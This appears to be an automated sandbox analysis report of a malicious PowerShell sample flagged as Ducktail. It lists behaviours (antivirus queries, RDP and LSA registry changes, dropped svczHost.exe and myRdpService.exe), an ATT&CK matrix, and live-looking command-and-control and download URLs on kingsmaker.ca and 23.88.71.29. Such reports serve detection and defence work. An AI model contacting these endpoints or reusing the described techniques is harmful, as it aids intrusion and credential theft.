        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0213~31bf3856ad364e35~amd64~~10.0.19041.1151.cat VolumeInformation
        Source: C:\Windows\Temp\svczHost.exeCode function: 16_2_00007FF66138BFE0 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,16_2_00007FF66138BFE0
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

        Lowering of HIPS / PFW / Operating System Security Settings

        barindex
        Source: C:\Windows\Temp\myRdpService.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Lsa DisableRestrictedAdmin
        Source: powershell.exe, 00000001.00000002.3174733348.000001C83946D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.3088266180.000001C81EB62000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.4180843271.000001BD75C4C000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.4175188738.000001BD75BD9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
        Source: powershell.exe, 00000001.00000002.3174733348.000001C83946D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Defender\MsMpeng.exe
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : SELECT * FROM AntivirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - Root\SecurityCenter2 : select * from AntivirusProduct

        Stealing of Sensitive Information

        barindex
        Source: Yara matchFile source: Process Memory Space: svczHost.exe PID: 9708, type: MEMORYSTR
        Source: Yara matchFile source: amsi64_5936.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3620, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5936, type: MEMORYSTR

        Remote Access Functionality

        barindex
        Source: Yara matchFile source: Process Memory Space: svczHost.exe PID: 9708, type: MEMORYSTR
        Source: Yara matchFile source: amsi64_5936.amsi.csv, type: OTHER
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3620, type: MEMORYSTR
        Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 5936, type: MEMORYSTR
        Source: C:\Windows\Temp\myRdpService.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Terminal Server fSingleSessionPerUser
        ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
        Gather Victim Identity InformationAcquire InfrastructureValid Accounts431
        Windows Management Instrumentation
        1
        DLL Side-Loading
        1
        DLL Side-Loading
        1
        Disable or Modify Tools
        OS Credential Dumping1
        System Time Discovery
        1
        Remote Desktop Protocol
        1
        Archive Collected Data
        1
        Ingress Tool Transfer
        Exfiltration Over Other Network MediumAbuse Accessibility Features
        CredentialsDomainsDefault Accounts2
        Command and Scripting Interpreter
        11
        Windows Service
        11
        Windows Service
        1
        Deobfuscate/Decode Files or Information
        LSASS Memory2
        File and Directory Discovery
        Remote Desktop ProtocolData from Removable Media11
        Encrypted Channel
        Exfiltration Over BluetoothNetwork Denial of Service
        Email AddressesDNS ServerDomain Accounts1
        Service Execution
        Logon Script (Windows)11
        Process Injection
        1
        Obfuscated Files or Information
        Security Account Manager125
        System Information Discovery
        SMB/Windows Admin SharesData from Network Shared Drive11
        Non-Standard Port
        Automated ExfiltrationData Encrypted for Impact
        Employee NamesVirtual Private ServerLocal Accounts4
        PowerShell
        Login HookLogin Hook1
        Software Packing
        NTDS531
        Security Software Discovery
        Distributed Component Object ModelInput Capture3
        Non-Application Layer Protocol
        Traffic DuplicationData Destruction
        Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
        DLL Side-Loading
        LSA Secrets1
        Process Discovery
        SSHKeylogging14
        Application Layer Protocol
        Scheduled TransferData Encrypted for Impact
        Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
        File Deletion
        Cached Domain Credentials341
        Virtualization/Sandbox Evasion
        VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
        DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
        Masquerading
        DCSync1
        Application Window Discovery
        Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
        Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
        Modify Registry
        Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
        Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt341
        Virtualization/Sandbox Evasion
        /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
        IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron11
        Process Injection
        Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1565058 Sample: kingsmaker_6.ca.ps1 Startdate: 29/11/2024 Architecture: WINDOWS Score: 100 80 kingsmaker.ca 2->80 82 chrome.cloudflare-dns.com 2->82 92 Malicious sample detected (through community Yara rule) 2->92 94 Yara detected Ducktail 2->94 96 Sigma detected: PowerShell Base64 Encoded Invoke Keyword 2->96 98 8 other signatures 2->98 10 powershell.exe 14 45 2->10         started        15 myRdpService.exe 2->15         started        17 svczHost.exe 2->17         started        signatures3 process4 dnsIp5 88 kingsmaker.ca 172.67.179.67, 443, 49735, 49736 CLOUDFLARENETUS United States 10->88 76 C:\Users\user\AppData\...\lgpiiklc.cmdline, Unicode 10->76 dropped 114 Queries sensitive physical memory information (via WMI, Win32_PhysicalMemory, often done to detect virtual machines) 10->114 116 Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines) 10->116 118 Found suspicious powershell code related to unpacking or dynamic code loading 10->118 134 3 other signatures 10->134 19 cmd.exe 1 10->19         started        22 powershell.exe 3 27 10->22         started        24 csc.exe 3 10->24         started        27 conhost.exe 10->27         started        90 23.88.71.29, 49763, 49764, 49765 ENZUINC-US United States 15->90 120 Uses regedit.exe to modify the Windows registry 15->120 122 Allows multiple concurrent remote connection 15->122 124 Modifies security policies related information 15->124 136 2 other signatures 15->136 29 cmd.exe 15->29         started        31 powershell.exe 15->31         started        33 regedit.exe 15->33         started        78 C:\Windows\Temp\myRdpService.exe, PE32+ 17->78 dropped 126 Antivirus detection for dropped file 17->126 128 Multi AV Scanner detection for dropped file 17->128 130 Suspicious powershell command line found 17->130 132 Encrypted powershell cmdline option found 17->132 35 powershell.exe 17->35         started        37 9 other processes 17->37 file6 signatures7 process8 file9 100 Suspicious powershell command line found 19->100 102 Encrypted powershell cmdline option found 19->102 104 Bypasses PowerShell execution policy 19->104 39 powershell.exe 47 19->39         started        43 conhost.exe 19->43         started        106 Loading BitLocker PowerShell Module 22->106 53 2 other processes 22->53 72 C:\Users\user\AppData\Local\...\lgpiiklc.dll, PE32 24->72 dropped 45 cvtres.exe 1 24->45         started        55 2 other processes 29->55 47 systeminfo.exe 31->47         started        49 conhost.exe 31->49         started        74 C:\Windows\Temp\regBackup.reg, Windows 33->74 dropped 51 conhost.exe 35->51         started        57 14 other processes 37->57 signatures10 process11 file12 70 C:\Windows\Temp\svczHost.exe, PE32+ 39->70 dropped 108 Potential dropper URLs found in powershell memory 39->108 110 Loading BitLocker PowerShell Module 39->110 59 conhost.exe 39->59         started        112 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 47->112 61 WmiPrvSE.exe 47->61         started        63 RdrCEF.exe 53->63         started        65 net1.exe 57->65         started        signatures13 process14 process15 67 RdrCEF.exe 63->67         started        dnsIp16 84 chrome.cloudflare-dns.com 172.64.41.3, 443, 49749, 49750 CLOUDFLARENETUS United States 67->84 86 23.204.249.81, 443, 49753 AKAMAI-ASUS United States 67->86

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.


        windows-stand
        SourceDetectionScannerLabelLink
        kingsmaker_6.ca.ps111%ReversingLabs
        SourceDetectionScannerLabelLink
        C:\Windows\Temp\svczHost.exe100%AviraTR/AVI.Agent.izors
        C:\Windows\Temp\myRdpService.exe5%ReversingLabs
        C:\Windows\Temp\svczHost.exe67%ReversingLabsWin64.Trojan.Generic
        No Antivirus matches
        No Antivirus matches
        SourceDetectionScannerLabelLink
        http://html4/loose.dtd0%Avira URL Cloudsafe
        http://23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e20%Avira URL Cloudsafe
        https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a30%Avira URL Cloudsafe
        https://kingsmaker.ca0%Avira URL Cloudsafe
        https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66ff68cb5bc7a7adc6c2dde79a5e11323d0%Avira URL Cloudsafe
        http://.css0%Avira URL Cloudsafe
        http://kingsmaker.ca:443/x0%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/c9af4eb65b32cc5a1a04364bb04718580813a988e08eb74585229c2e772e2187549fdd220%Avira URL Cloudsafe
        https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66c060ef5a4b60433d181b4c53f36668ff0%Avira URL Cloudsafe
        http://kingsmaker.ca0%Avira URL Cloudsafe
        https://kingsmaker.ca/file3/c30565f5b7d349dca2c674865a83c8be2eda701bd9fa3efd6b1a406548e08a5241b9e3eb0%Avira URL Cloudsafe
        http://crl.microsoft.co0%Avira URL Cloudsafe
        https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663d6c6496bde6500%Avira URL Cloudsafe
        http://.jpg0%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/7d92d4d72726511a7b9e025d800769b17a5809cd4d11ed5c67d79d417b2e8db5aa7ca729e39fac87f28f57d7357bf36e5b49f2b0cebc3bd94dba368f30a45afe0e99900e907285cf47daec2a455aa74b10f8070ac6411a1ed0d9940ffd7d6a2b24ff6d400df08dbb5e2d0894c9d90c9a0%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/49508e4a94e55731c13cdad92122b7aa2ebdf21d51630b7cdcc73837245a4bab7339db110%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/30bb492ec87899a2b4a8fa5c9eeec4695f1fc1e8e554f577b25695147f22b6d1aa6674240%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/30bb492ec87899a2b4a8fa5c9eeec4695f1fc1e8e554f577b25695147f22b6d1aa66742445be33750b633b56ea7f99bbb29fdde9b913e810a43e3fb7fc67f0c3fa02ef9b3c2868997a0d2ca950c4eb32e3b408791f34e135b54dbce6fa1a4c760%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/49508e4a94e55731c13cdad92122b7aa2ebdf21d51630b7cdcc73837245a4bab7339db115da9503bff5f3eb63dd5c8b58a4edbb94e89e961ebecca194b9e0e9e7656d46736c256bfc8b3dc86635484638b966bdfe9f1621daa6f792b5a53044675d929c45f5b8ee476604bf020ab6dd80%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/9aea8bf833c8770959db7c728f4ccdcfc8f4e930af4dd44e65213b9b4a478e5f86dc119a0%Avira URL Cloudsafe
        http://pesterbdd.com/images/Pester.png0%Avira URL Cloudsafe
        http://23.88.71.29:8000/api/registry0%Avira URL Cloudsafe
        http://crl.mic0%Avira URL Cloudsafe
        https://go.micro0%Avira URL Cloudsafe
        http://pesterbdd.com/images/Pester.pngh0%Avira URL Cloudsafe
        https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66c060ef5a4b60430%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/9aea8bf833c8770959db7c728f4ccdcfc8f4e930af4dd44e65213b9b4a478e5f86dc119a0810194a9087440b790382eb7115a9d6a33bc02028e55678abe02ad45d48e9afa93af837531e35b1c88e6bfcafa27d82ee244203b86a650acf33460676e19e4d50ccbf7b795575b481ec4d430%Avira URL Cloudsafe
        https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd70%Avira URL Cloudsafe
        http://23.88.71.29:8000/client/ws0%Avira URL Cloudsafe
        https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66ff68cb5bc7a7ad0%Avira URL Cloudsafe
        http://crl.micro0%Avira URL Cloudsafe
        https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad50%Avira URL Cloudsafe
        https://kingsmaker.ca/StaticFile/RdpService/790%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/7d92d4d72726511a7b9e025d800769b17a5809cd4d11ed5c67d79d417b2e8db5aa7ca7290%Avira URL Cloudsafe
        https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663d6c6496bde6507104fb3a8f8b3971510%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/c9af0%Avira URL Cloudsafe
        https://kingsmaker.ca/file3/c30565f5b7d349dca2c674865a83c8be2eda701bd9fa3efd6b1a406548e08a5241b9e3eb87ec64b75eef9f6703a3eb783bfa9ee7e92345daa3a62b976fb3d4ee238d363a7b5e9cf6d398cb37e4de3d85ec1f5daf0cf8c35fefe5c7fdd20dd092/Windows%20Defender/16/16/user/1890%Avira URL Cloudsafe
        https://kingsmaker.ca/StaticFile/RdpService/79h0%Avira URL Cloudsafe
        http://go.microsoft.c0%Avira URL Cloudsafe
        http://kingsmaker.ca/api/check0%Avira URL Cloudsafe
        https://oneget.org0%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/055818ee2313288dc6c42d3f2980e607ad634befb495720ee1b37bba5e4f01458e1103e77e09a45c8c93401cf2bf452c6f70bca155b8ef39c0202e72ce5c5f4083673a0b5386ffd139c7d42f2ea2005be8516f5ad829f94abeab8f7fe32ba02b88e44df5b04afca3c479a650327a20a90%Avira URL Cloudsafe
        https://kingsmaker.ca/0%Avira URL Cloudsafe
        https://kingsmaker.ca/StaticFile/TermServiceTryRun/720%Avira URL Cloudsafe
        https://kingsmaker.ca/file2/055818ee2313288dc6c42d3f2980e607ad634befb495720ee1b37bba5e4f01458e1103e70%Avira URL Cloudsafe
        http://pesterbdd.com/images/Pester.pngXz0%Avira URL Cloudsafe
        NameIPActiveMaliciousAntivirus DetectionReputation
        chrome.cloudflare-dns.com
        172.64.41.3
        truefalse
          high
          kingsmaker.ca
          172.67.179.67
          truetrue
            unknown
            NameMaliciousAntivirus DetectionReputation
            http://23.88.71.29:8000/api/registry/upload/6cce7182d50ed3d7e611466cceafa5e2false
            • Avira URL Cloud: safe
            unknown
            https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66ff68cb5bc7a7adc6c2dde79a5e11323dfalse
            • Avira URL Cloud: safe
            unknown
            https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66c060ef5a4b60433d181b4c53f36668fffalse
            • Avira URL Cloud: safe
            unknown
            https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b66e0a317167abfd71e08f88f42593360a3false
            • Avira URL Cloud: safe
            unknown
            https://kingsmaker.ca/file2/49508e4a94e55731c13cdad92122b7aa2ebdf21d51630b7cdcc73837245a4bab7339db115da9503bff5f3eb63dd5c8b58a4edbb94e89e961ebecca194b9e0e9e7656d46736c256bfc8b3dc86635484638b966bdfe9f1621daa6f792b5a53044675d929c45f5b8ee476604bf020ab6dd8false
            • Avira URL Cloud: safe
            unknown
            https://kingsmaker.ca/file2/30bb492ec87899a2b4a8fa5c9eeec4695f1fc1e8e554f577b25695147f22b6d1aa66742445be33750b633b56ea7f99bbb29fdde9b913e810a43e3fb7fc67f0c3fa02ef9b3c2868997a0d2ca950c4eb32e3b408791f34e135b54dbce6fa1a4c76false
            • Avira URL Cloud: safe
            unknown
            https://kingsmaker.ca/file2/7d92d4d72726511a7b9e025d800769b17a5809cd4d11ed5c67d79d417b2e8db5aa7ca729e39fac87f28f57d7357bf36e5b49f2b0cebc3bd94dba368f30a45afe0e99900e907285cf47daec2a455aa74b10f8070ac6411a1ed0d9940ffd7d6a2b24ff6d400df08dbb5e2d0894c9d90c9afalse
            • Avira URL Cloud: safe
            unknown
            http://23.88.71.29:8000/api/registryfalse
            • Avira URL Cloud: safe
            unknown
            https://kingsmaker.ca/file2/9aea8bf833c8770959db7c728f4ccdcfc8f4e930af4dd44e65213b9b4a478e5f86dc119a0810194a9087440b790382eb7115a9d6a33bc02028e55678abe02ad45d48e9afa93af837531e35b1c88e6bfcafa27d82ee244203b86a650acf33460676e19e4d50ccbf7b795575b481ec4d43false
            • Avira URL Cloud: safe
            unknown
            http://23.88.71.29:8000/client/wsfalse
            • Avira URL Cloud: safe
            unknown
            https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663d6c6496bde6507104fb3a8f8b397151false
            • Avira URL Cloud: safe
            unknown
            https://chrome.cloudflare-dns.com/dns-queryfalse
              high
              https://kingsmaker.ca/StaticFile/RdpService/79false
              • Avira URL Cloud: safe
              unknown
              https://kingsmaker.ca/file3/c30565f5b7d349dca2c674865a83c8be2eda701bd9fa3efd6b1a406548e08a5241b9e3eb87ec64b75eef9f6703a3eb783bfa9ee7e92345daa3a62b976fb3d4ee238d363a7b5e9cf6d398cb37e4de3d85ec1f5daf0cf8c35fefe5c7fdd20dd092/Windows%20Defender/16/16/user/189false
              • Avira URL Cloud: safe
              unknown
              http://kingsmaker.ca/api/checkfalse
              • Avira URL Cloud: safe
              unknown
              https://kingsmaker.ca/StaticFile/TermServiceTryRun/72false
              • Avira URL Cloud: safe
              unknown
              https://kingsmaker.ca/file2/055818ee2313288dc6c42d3f2980e607ad634befb495720ee1b37bba5e4f01458e1103e77e09a45c8c93401cf2bf452c6f70bca155b8ef39c0202e72ce5c5f4083673a0b5386ffd139c7d42f2ea2005be8516f5ad829f94abeab8f7fe32ba02b88e44df5b04afca3c479a650327a20a9false
              • Avira URL Cloud: safe
              unknown
              NameSourceMaliciousAntivirus DetectionReputation
              http://html4/loose.dtdpowershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmpfalse
              • Avira URL Cloud: safe
              unknown
              https://aka.ms/nativeaot-csvczHost.exe, myRdpService.exefalse
                high
                https://contoso.com/Licensepowershell.exe, 00000014.00000002.3661826241.00000186CA8FA000.00000004.00000800.00020000.00000000.sdmpfalse
                  high
                  http://kingsmaker.ca:443/xsvczHost.exe, 00000010.00000002.4401647954.00000252B68A9000.00000004.00001000.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://kingsmaker.capowershell.exe, 00000001.00000002.3090409708.000001C820D69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B558EE000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD019FB000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD003D1000.00000004.00000800.00020000.00000000.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  http://.csspowershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmpfalse
                  • Avira URL Cloud: safe
                  unknown
                  https://github.com/dotnet/runtimepowershell.exe, 00000009.00000002.3927729822.000001BD10310000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000002.4408300872.00007FF6618C1000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7248000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6618C1000.00000002.00000001.01000000.0000000A.sdmpfalse
                    high
                    https://kingsmaker.ca/file2/c9af4eb65b32cc5a1a04364bb04718580813a988e08eb74585229c2e772e2187549fdd22powershell.exe, 00000001.00000002.3090409708.000001C82122B000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://kingsmaker.capowershell.exe, 00000009.00000002.3329091603.000001BD019FB000.00000004.00000800.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: safe
                    unknown
                    http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidYpowershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmpfalse
                      high
                      http://schemas.xmlsoap.org/ws/2005/05/identity/claims/denyonlysidsvczHost.exe, svczHost.exe, 00000010.00000002.4407993063.00007FF66174F000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exefalse
                        high
                        https://aka.ms/dotnet-warnings/powershell.exe, 00000009.00000002.3927729822.000001BD10310000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3927729822.000001BD10AD9000.00000004.00000800.00020000.00000000.sdmp, svczHost.exe, svczHost.exe, 00000010.00000002.4408300872.00007FF6618C1000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6619DA000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7B46000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000010.00000002.4402715368.00000252B7248000.00000004.00001000.00020000.00000000.sdmp, svczHost.exe, 00000010.00000000.3312136886.00007FF6618C1000.00000002.00000001.01000000.0000000A.sdmp, svczHost.exe, 00000010.00000002.4407993063.00007FF66174F000.00000004.00000001.01000000.0000000A.sdmp, myRdpService.exe, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmpfalse
                          high
                          https://aka.ms/winsvr-2022-pshelpXzpowershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD00CD0000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://crl.microsoft.copowershell.exe, 00000005.00000002.3077551508.0000015B6D871000.00000004.00000020.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            unknown
                            https://aka.ms/nativeaot-compatibilitymyRdpService.exe, myRdpService.exe, 00000029.00000002.4404925157.00007FF63BFAC000.00000002.00000001.01000000.0000000B.sdmpfalse
                              high
                              https://contoso.com/powershell.exe, 00000014.00000002.3661826241.00000186CA8FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.3157492838.000001C830BB4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3071558533.0000015B653A5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3927729822.000001BD10077000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000014.00000002.3661826241.00000186CA8FA000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  https://kingsmaker.ca/file2/9aea8bf833c8770959db7c728f4ccdcfc8f4e930af4dd44e65213b9b4a478e5f86dc119apowershell.exe, 00000009.00000002.3329091603.000001BD00001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://kingsmaker.ca/file3/c30565f5b7d349dca2c674865a83c8be2eda701bd9fa3efd6b1a406548e08a5241b9e3ebpowershell.exe, 00000001.00000002.3090409708.000001C820D69000.00000004.00000800.00020000.00000000.sdmpfalse
                                  • Avira URL Cloud: safe
                                  unknown
                                  https://github.com/Pester/PesterXzpowershell.exe, 00000001.00000002.3090409708.000001C820D69000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.3057536830.0000015B5559E000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.3329091603.000001BD0022D000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    https://kingsmaker.ca/4cbd637a18ca7708e831aa08ab10a140e403e6fad505596e522bd464a59b4b663d6c6496bde650powershell.exe, 00000001.00000002.3090409708.000001C821104000.00000004.00000800.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    unknown
